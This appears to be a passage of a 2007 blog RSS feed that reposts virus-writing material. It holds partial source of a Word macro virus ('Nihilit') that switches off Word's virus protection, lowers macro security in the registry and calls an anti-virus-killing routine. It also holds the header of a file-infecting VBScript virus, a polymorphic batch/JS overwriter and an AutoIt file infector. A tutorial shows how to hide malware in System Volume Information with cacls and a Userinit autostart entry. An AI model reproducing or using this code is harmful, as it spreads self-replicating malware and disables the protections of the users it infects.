effective virus, however, you *must* know assembly......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Mon, 05 Nov 2007 14:20:25 GMT</pubDate></item><item><title><![CDATA[Nihilit]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2140/</link><description><![CDATA[<h2>nihilit.vbs</h2> <hr /> <pre>
Attribute VB_Name = &quot;Nihilit
Sub AutoClose()
On Error Resume Next
'==========================================
'=======  Nihilit v4.0 / Nihilit.d  =======
'==========================================
'=== (c) by Necronomikon |[Zer0Gravity] ===
'==========================================
'greets flies out to: Serial Killer(Bitte!;p),GigaByte,jackie,
'Ultras,DX100h,DrG0nzo,The Mental Driller,VirusBuster,$moothie,
'BSL4,Ratter,Benny,NBK,Del_Armg0,SnakeByte,TheWalrus,Malfuntion,
'Belial,CyberWarrior,PhileToaster,newmann,ocker,fii7e
'and all in #virus,#vir,#vxers,#zerogravity,...
'hope to forget nobody.....!
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = &quot;porno.doc&quot;
If sv = 3 Then svt$ = &quot;readme!.doc&quot;
If sv = 2 Then svt$ = &quot;sex.doc&quot;
Call Nihilit
Call KillAV
z = Application.System.PrivateProfileString(&quot;&quot;, _
&quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows&quot; &amp; _
&quot;\CurrentVersion\App Paths\winzip32.exe&quot;, &quot;&quot;)
w = Environ(&quot;windir&quot;)
VBA.Shell z &amp; &quot; -a -r &quot; &amp; w &amp; &quot;\Nihilit.zip&quot; _
&amp; Chr(32) &amp; w &amp; &quot;\nihilit.doc&quot;, vbHide
End Sub
Sub Nihilit()
On Error Resume Next
'thanks to j&acute; for advanced codes
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
'---
Application.DisplayAlerts = wdAlertsNone
CommandBars(&quot;Macro&quot;).Controls(&quot;Security...&quot;).Enabled = False
System.PrivateProfileString(&quot;&quot;,     &quot;HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security&quot;, &quot;Level&quot;) = 1&amp;
System.PrivateProfileString(&quot;&quot;,     &quot;HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security&quot;, &quot;Level&quot;) = 1&amp;
If System.PrivateProfileString(&quot;&quot;, &quot;HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security&quot;, &quot;AccessVBOM&quot;) &amp;lt;&amp;gt; 1&amp; Then......</pre>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Mon, 05 Nov 2007 14:00:50 GMT</pubDate></item><item><title><![CDATA[Valium]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2139/</link><description><![CDATA[<h2>valium.vbs</h2> <hr /> <pre>
'valium
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
' The
' ****   ***** ******  *****   ***** ***** **** ***** *****
'   ***   *** ***   **  ***     ***   ***   **   *********
'    *** ***  ********  ***     ***   ***   **   *** ** **
'     *****   ***   **  ***     ***   ***   **   ***    **
'      ***    ***   ** ******* *****   ******   *****  ****
'
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Valium is an Script virus,made in Visual Basic Script.
'Valium designed to infect many file types which is vulnerable for script to attack.
'it also has ability to infect graph files such as bmp,jpg,gif even it is not realy
'infection,but I think valium had show you how script infect those files.
'Valium infecting some project files such as cpp,frm and pas by adding it self in it
'Valium also adding it self in every zip or rar files,using lame bugs from its internal command
'Valium injecting it self in every nrb and nri files,see my article about what is nri or nrb
'in 29a#8 and this is just simple implementation in script to spread via cd-room
'Valium also macro virus,it infecting doc and xls,by injecting it body in normal.temp/xlstart
'I think Valium is an big script infector,infecting at least 22 file types
'Some memory resident trick,duplicator type trick,booting stuff trick also available here
'Valium also has abiity to encrypt it self/selfcripting using poly/Epo tricky.
'Thats all about this lame shit,Do not code script if you don't have something new in it.
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Name		: Valium
'Author		: Psychologic/rRlf
'System		: 9x,Me,Nt,Xp with WSH ofcourse
'Target	files	: Portable Script
'		  vbs,vbe,js,bat,reg,nri,nrb,doc,xls,rar,zip,cpp,pas,frm,jpg,gif,bmp,ico,html,htt,shtml,htm
'Worming	: No this is virus not worm
'Polymorph	: Yes mixture with encryption and some silly......</pre>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Mon, 05 Nov 2007 13:59:30 GMT</pubDate></item><item><title><![CDATA[Infecting Mach-O Files]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2016/</link><description><![CDATA[<h2>What is a Mach-O file?</h2> <p>
Mach-O is the native file format used by OSX. There is a little similarity to Portable Executable files, but not much. Mach-O files are collections of segments. Each segment can contain one or more sections, which have different protection attributes.
</p> <h2>What does a Mach-O file look like?</h2> <p>
Everything about the format is public, most of the format is in loader.h. The file header structure is called mach_header. Each of the fields is 32-bits large. It has this format:
</p> <table border="1"> <tbody> <tr> <th>Offset</th><th>Field</th><th>Description</th> </tr> <tr> <td>0x00</td> <td>magic</td> <td>sig (0xfeedface (PowerPC), 0xcefaedfe (Intel))</td> </tr> <tr> <td>0x04</td> <td>cputype</td> <td>0x12 (PowerPC), 0x07 (Intel)</td> </tr> <tr> <td>0x08</td> <td>cpusubtype</td> <td>specific architecture</td> </tr> <tr> <td>0x0c</td> <td>filetype</td> <td>0x02 if executable</td> </tr> <tr> <td>0x10</td> <td>ncmds</td> <td>number of commands following</td> </tr> <tr> <td>0x14</td> <td>sizeofcmds</td> <td>total size of commands</td> </tr> <tr> <td>0x18</td> <td>flags</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>
The commands are used for many different purposes, such as describing segments and sections, initial values of the CPU registers for the main thread, and resolving symbols (equivalent to imports in PE files).
</p> <p>
The load_command structure has this format:
</p> <table border="1"> <tbody> <tr> <th>Offset</th><th>Field</th><th>Description</th> </tr> <tr> <td>0x00</td> <td>cmd</td> <td>type of command</td> </tr> <tr> <td>0x04</td> <td>cmdsize</td> <td>number of bytes in command (the value here can be larger than the command data, so this field must be used to reach the next command, do not rely on the command data)</td> </tr> </tbody> </table> <p>
Interesting commands are LC_SEGMENT (1) and LC_UNIXTHREAD (5). The LC_SEGMENT command describes a segment of memory. It is equivalent to a section in PE files. The segment_command structure has this format:
</p> <table border="1"> <tbody> <tr> <th>Offset</th><th>Size</th><th>Field</th><th>Description</th> </tr> <tr> <td>0x00</td> <td>16</td> <td>segname</td> <td>name of segment (ignored, just like PE)</td> </tr> <tr> <td>0x10</td> <td>4</td> <td>vmaddr</td> <td>segment<em>virtual</em> address</td> </tr> <tr> <td>0x14</td> <td>4</td> <td>vmsize</td> <td>segment virtual size</td> </tr> <tr> <td>0x18</td> <td>4</td> <td>fileoff</td> <td>segment file offset</td> </tr> <tr> <td>0x1c</td> <td>4</td> <td>filesize</td> <td>segment file size (0 means empty)</td> </tr> <tr> <td>0x20</td> <td>4</td> <td>maxprot</td> <td>maximum protection attributes (can disallows writable code, for example, but clearing PROT_WRITE bit)</td> </tr> <tr> <td>0x24</td> <td>4</td> <td>initprot</td> <td>initial protection attributes (combination of READ, WRITE, EXEC, but PROT_WRITE requires PROT_READ)</td> </tr> <tr>......</tr></tbody></table>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 02 Nov 2007 21:39:07 GMT</pubDate></item><item><title><![CDATA[Virus Detection Alternatives]]></title><link>http://blog.bitcomet.com/poldoom2002/post_2015/</link><description><![CDATA[<p> <em>An evaluation of different techniques for virus detection. The discussion is sufficiently general to be applicable to a substantial number of computing platforms. All mentioned practical issues concern the MS DOS operating system. Improvement of the operating system is presented as the most fundamental and therefore effective way to tackle the virus problem.</em> </p> <p> <em>Published July 1992 by the Dutch National Criminal Intelligence Service (CRI), Computer Crime Unit, PO Box 20304, 2500 EH, The Hague, The Netherlands.</em> </p> <h2>Contents</h2> <ul> <li>I. Introduction </li> <li>II. Theoretical implications </li> <li>III. Signature Scanning 
	<ul> <li>III.1. Description </li> <li>III.2. Capacity Problems </li> <li>III.3. Update Requirement </li> <li>III.4. Polymorphic viruses </li> </ul> </li> <li>IV. Heuristical Scanning 
	<ul> <li>IV.1. Description </li> <li>IV.2. Discussion </li> </ul> </li> <li>V. Integrity Checking 
	<ul> <li>V.1. Description </li> <li>V.2. Discussion </li> </ul> </li> <li>VI. Monitoring 
	<ul> <li>VI.1. Description </li> <li>VI.2. Discussion </li> </ul> </li> <li>VII. Hardware Protection 
	<ul> <li>VII.1. Description </li> <li>VII.2. Discussion </li> </ul> </li> <li>VIII. Miscellaneous Methods 
	<ul> <li>VIII.1. Software Write Protection </li> <li>VIII.2. Vaccination </li> <li>VIII.3. Bait Programs </li> </ul> </li> <li>IX. Operating System Improvement 
	<ul> <li>IX.1. Present Situation </li> <li>IX.2. The Responsibility of an Operating System </li> <li>IX.3. Suggestions for Improvement </li> <li>IX.4. Conclusion </li> </ul> </li> <li>X. Conclusion </li> <li>Notes </li> <li>Bibliography </li> <li>Proof Readers </li> </ul> <h2>Part I. Introduction and Problem Definition</h2> <h2>I. Introduction</h2> <p>
The phenomenon computer virus poses a threat to the reliability of automated systems. Considerable research effort has been put into the issue of how to detect and erase a virus. As a result, there are now several sophisticated anti-virus programs available. The most widely used detection method of these anti-virus programs is the so-called &quot;signature scanning&quot;.
</p> <p>
Recently, a new problem has arisen: for several reasons, the signature scanning detection method is rapidly becoming inadequate, and will eventually become obsolete. Therefore, alternative methods must be devised.
</p> <p>
In this paper we will attempt to evaluate different approaches......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Fri, 02 Nov 2007 21:34:49 GMT</pubDate></item><item><title><![CDATA[Hide in System Volume Information]]></title><link>http://blog.bitcomet.com/poldoom2002/post_493/</link><description><![CDATA[<p>
==================================<br />
&nbsp;Hide in System Volume Information<br />
==================================
</p> <p>
1. Intro<br />
2. Explaining<br />
3. Code<br />
4. Exit
</p> <p> <br />
=======<br />
1.Intro<br />
=======
</p> <p>
This technique shows how we can better hide our malware in a System Volume Information<br />
folder, an&nbsp; idea&nbsp; comes to me after reading berniee's article &quot;Explaining the usage of<br />
pipes in VX coding&quot;, you can&nbsp; read&nbsp; it in berniee's&nbsp; homepage,&nbsp; or in rRlf#7, so a big<br />
thanx for that! Greetings to Nibble, DiA, and Retro for some beta testings and help.<br />
Enjoy ;)
</p> <p> <br />
============<br />
2.Explaining<br />
============
</p> <p>
The scheme of tech is very simple:
</p> <p>
Using cacls.exe we remove SVI folder privileges by this command:<br />
cacls &quot;C:\System Volume Information&quot; /E /G Username:F
</p> <p>
after we do so, we copy ourselfs there as system.exe (it's can<br />
be any other filename), and closin priviliges by this command:<br />
cacls &quot;C:\System Volume Information&quot; /E /R Username
</p> <p>
After those procedures we must set somethin to registry startup<br />
key, i choosed Userinit, u can any else, if you choose Userinit<br />
too, then Userinit value data must be:<br />
Sysdirpath\Userinit.exe,cacls &quot;C:\System Volume Information&quot; /E /G Username,C:\System Volume Information\system.exe
</p> <p>
as you see we don't touch &quot;Sysdirpath\Userinit.exe,&quot;, let it be<br />
here, we just add some our data.
</p> <p>
During system startup this command removes SVI folder privileges:<br />
cacls &quot;C:\System Volume Information&quot; /E /G Username
</p> <p>
then our malware executes from SVI folder and closes privileges:<br />
C:\System Volume Information\system.exe
</p> <p>
If a user will try to access SVI folder, he will probably get an<br />
error that access is denied.
</p> <p>
And before code, i want tell you something, that this tech will<br />
probably worx only on NTFS (NT FILE SYSTEM) formatted HDDs, not<br />
on FAT32.
</p> <p>
=======<br />
3. Code<br />
=======
</p> <p>
.686<br />
.model flat,stdcall<br />
option casemap:none
</p> <p>
&nbsp;include \masm32\include\windows.inc<br />
&nbsp;include \masm32\include\kernel32.i......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 16 Sep 2007 17:28:25 GMT</pubDate></item><item><title><![CDATA[BAT TO EXE FILE CONVERTOR...]]></title><link>http://blog.bitcomet.com/poldoom2002/post_491/</link><description><![CDATA[<p>
HY..ALL...<img src="/Emotions/dump/22.gif" border="0" alt="" align="absmiddle" />
</p>
<p>
<a href="http://rapidshare.com/files/56072222/Bat_To_Exe_Converter_v1_1_.3.exe">http://rapidshare.com/files/56072222/Bat_To_Exe_Converter_v1_1_.3.exe</a>
</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 16 Sep 2007 17:06:32 GMT</pubDate></item><item><title><![CDATA[CC and JADA ..]]></title><link>http://blog.bitcomet.com/poldoom2002/post_484/</link><description><![CDATA[<p>
CC 
</p> <p>
rem (/*<br />
@echo off<br />
set cbv=cscript<br />
%cbv% /nologo /e:javascript %0<br />
goto qtdvcpwyffeegr&nbsp; <br />
*/)
</p> <p>
function rem() {<br />
&nbsp;&nbsp;&nbsp; //MPA - batch/js poly overwriter<br />
&nbsp;&nbsp;&nbsp; //saef.ML
</p> <p>
&nbsp;&nbsp;&nbsp; var vewqgfwxediit = WScript.CreateObject('Scripting.FileSystemObject');<br />
&nbsp;&nbsp;&nbsp; xeuwecqircfgp = vewqgfwxediit.GetFile(WScript.scriptName);<br />
&nbsp;&nbsp;&nbsp; var bapsxssftiwtsqb = new Array(&quot;vewqgfwxediit&quot;, &quot;ftfdyapsppitr&quot;, &quot;qtdvcpwyffeegr&quot;, &quot;dtxhixuidswcxh&quot;, &quot;ppxbgpriftvbie&quot;, <br />
&nbsp;&nbsp;&nbsp; &quot;qhfqbpbvqbfuev&quot;, &quot;bapsxssftiwtsqb&quot;, &quot;cyduehfxqvpgpq&quot;, &quot;irbxtpbvqavhh&quot;, &quot;xpcbtdgrhrses&quot;, &quot;ruitdqhsggspqew&quot;, &quot;ufrecdyhpffxxsu&quot;,<br />
&nbsp;&nbsp;&nbsp; &quot;hvqrpaxvwchcxw&quot;, &quot;xeuwecqircfgp&quot;, &quot;dcftwughrisreu&quot;, &quot;uhuvecvfuqxbde&quot;, &quot;cbv&quot;, &quot;fqsvtxhfictwsr&quot;, &quot;dbvprhibqqhfhbe&quot;, &quot;hhurasufcsshgv&quot;)<br />
&nbsp;&nbsp;&nbsp; var qhfqbpbvqbfuev = vewqgfwxediit.OpenTextFile(xeuwecqircfgp, 1, true);<br />
&nbsp;&nbsp;&nbsp; dcftwughrisreu = qhfqbpbvqbfuev.readAll(); qhfqbpbvqbfuev.close(); for (s = 0; s &lt;= bapsxssftiwtsqb.length; s++) {<br />
&nbsp;&nbsp;&nbsp; dcftwughrisreu = dtxhixuidswcxh(dcftwughrisreu, bapsxssftiwtsqb[s], irbxtpbvqavhh())<br />
&nbsp;&nbsp;&nbsp; } var ppxbgpriftvbie = vewqgfwxediit.OpenTextFile(xeuwecqircfgp, 2, true); ppxbgpriftvbie.Writeline(dcftwughrisreu);<br />
&nbsp;&nbsp;&nbsp; ppxbgpriftvbie.Close();} function dtxhixuidswcxh(xpcbtdgrhrses, ruitdqhsggspqew, ufrecdyhpffxxsu) {<br />
&nbsp;&nbsp;&nbsp; try{while (xpcbtdgrhrses.indexOf(ruitdqhsggspqew) &gt;&nbsp; - 1){hvqrpaxvwchcxw = xpcbtdgrhrses.indexOf(ruitdqhsggspqew);xpcbtdgrhrses = &quot;&quot; + (xpcbtdgrhrses.substring(0, hvqrpaxvwchcxw) + ufrecdyhpffxxsu +<br />
&nbsp;&nbsp;&nbsp; xpcbtdgrhrses.substring((hvqrpaxvwchcxw + ruitdqhsggspqew.length), xpcbtdgrhrses.length));}}catch (err)<br />
&nbsp;&nbsp;&nbsp; {return xpcbtdgrhrses;}......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 16 Sep 2007 05:37:44 GMT</pubDate></item><item><title><![CDATA[RUNDLL For Better WORMZ...]]></title><link>http://blog.bitcomet.com/poldoom2002/post_483/</link><description><![CDATA[<p>
RUNDLL and RUNDLL32<br />
&nbsp; By:The Mastermind
</p> <p>
RUNDLL and RUNDLL32 are two utilities supplied with Windows 95/98 and NT.<br />
They can call DLL functions from the command line, allowing us to create extremely powerfull batch files.
</p> <p>
Some examples:
</p> <p>
Start Control Panel applets (2): <br />
General syntax: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL filename.CPL,@n,t<br />
where&nbsp;&nbsp; filename.CPL&nbsp;&nbsp; is the name of one of Control Panel's *.CPL files, <br />
&nbsp; n&nbsp;&nbsp; is the zero based number of the applet within the *.CPL file, and <br />
&nbsp; t&nbsp;&nbsp; is the number of the tab for multi paged applets <br />
&nbsp; 
</p> <p>
Examples: <br />
Date/time applet, Time Zone tab: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,@0,1<br />
Desktop applet, Screensaver tab: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL DESK.CPL,@0,1<br />
Network applet, Protocols tab: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL NCPA.CPL,@0,2<br />
Network applet, Adapters tab: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL NCPA.CPL,@0,3<br />
System applet, Environment tab: <br />
RUNDLL32 SHELL32.DLL,Control_RunDLL SYSDM.CPL,@0,2<br />
An alternative approach is using CONTROL.EXE.<br />
However, if you want to make your batch file wait for the Control Panel applet to be closed, you'll have to use the RUNDLL32 command with START /WAIT <br />
General syntax: <br />
CONTROL.EXE filename.CPL,@n,t<br />
where&nbsp;&nbsp; filename.CPL&nbsp;&nbsp; is the name of one of Control Panel's *.CPL files, <br />
&nbsp; n&nbsp;&nbsp; is the zero based number of the applet within the *.CPL file, and <br />
&nbsp; t&nbsp;&nbsp; is the number of the tab for multi paged applets <br />
&nbsp; 
</p> <p>
Examples: <br />
Date/time applet, Time Zone tab: <br />
CONTROL.EXE TIMEDATE.CPL,@0,1<br />
Desktop applet, Screensaver tab: <br />
CONTROL.EXE DESK.CPL,@0,1<br />
or alternatively, in Windows 2000 &amp; XP: <br />
CONTROL.EXE DESK.CPL ,@ScreenSaver<br />
Note the space between the *.CPL file name and the comma.<br />
This seems to work for DESK.CPL only.<br />
Use the description on the tab, remove any spaces.<br />
&nbsp;<br />
Credits: Neil J. Rubenking, in one of his articles in PC Magazine.<br />
Tip: Leslie......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 16 Sep 2007 05:33:42 GMT</pubDate></item><item><title><![CDATA[vbx]]></title><link>http://blog.bitcomet.com/poldoom2002/post_482/</link><description><![CDATA[<p>
;MPA Hack
</p> <p>
$Found = 0<br />
$Sig = &quot;;MPA Hack&quot;<br />
$Script = @scriptname<br />
$search = FileFindFirstFile(&quot;*.au3&quot;)&nbsp; <br />
$search = FileFindSecondFile(&quot;*.mp3&quot;)
</p> <p>
If $search = -1 Then<br />
&nbsp;&nbsp;&nbsp; Exit<br />
EndIf
</p> <p>
While 1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $file = FileFindNextFile($search) <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($file == &quot;&quot;) then ExitLoop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($file &lt;&gt; $Script) then
</p> <p>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $check = FileOpen($file, 0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; While 1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $line = FileReadLine($check)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If @error = -1 Then ExitLoop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($line = $Sig) then $Found = $Found + 1<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Wend<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FileClose($check)
</p> <p>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($Found == 1) then exitloop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $Victim = FileOpen($file, 0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If $Victim = -1 then exitloop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ReadAllHost = FileRead($Victim, FileGetSize($file))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FileClose($Victim)
</p> <p>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $MySelf = FileOpen($Script, 0)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; If $MySelf = -1 then exitloop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ReadAll = FileRead($MySelf, FileGetSize($Script))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FileClose($MySelf)
</p> <p>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp......</p>]]></description><author>poldoom2002 (POLDOOM2002)</author><pubDate>Sun, 16 Sep 2007 05:28:06 GMT</pubDate></item></channel></rss>